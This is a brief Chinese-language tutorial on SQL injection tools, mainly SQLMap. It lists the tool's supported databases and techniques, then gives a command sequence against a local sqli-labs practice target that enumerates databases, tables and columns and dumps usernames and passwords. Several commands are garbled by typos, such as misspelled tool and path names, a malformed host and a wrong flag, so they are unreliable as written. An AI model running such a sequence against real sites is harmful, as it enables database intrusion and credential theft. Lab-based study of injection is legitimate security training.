SQL注入工具
SQLMap,阿D,名小子
SQLMap:開源的自動化SQL注入工具,由Pythonn寫成.
1.完全支持多種數據庫管理系統:
MySQL、Oracle、PostgreSQL、Microsoft SQL Server、
Microsoft Access、IBM DB2、SQLite、Firebird、Sybase
、SAP MaxDB、HSQLDB和Informix等
2.支持5種SQL注入技術:
聯合查詢注入,布爾注入,時間注入,報錯注入,堆查詢注入
3.支持枚舉用戶,密碼,哈希,權限,角色,數據庫,數據表和列
4.支持自動識別密碼哈希格式並通過字典破解密碼哈希.
SQLMap的使用
注入流程:查找注入點–>查庫名–>查表名–>查字段名–>查重點數據
針對GET型
1.判斷是否存在注入
slqmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1"
2.爆庫
sqlmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1" --dbs
3.爆表
sqlmap.py -u "127.0.0.1/slqi-labs/Less-1/?id=1" --tables -D security
4.爆列
slqmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1" --colums -T users -D security
5.爆數據
sqlmap.py -u "127.0.0.qli-labs/Less-1/?id=1" --dump -C password,username -T users -D security
針對POST型
sqlmap,py -r 3.txt --dbs
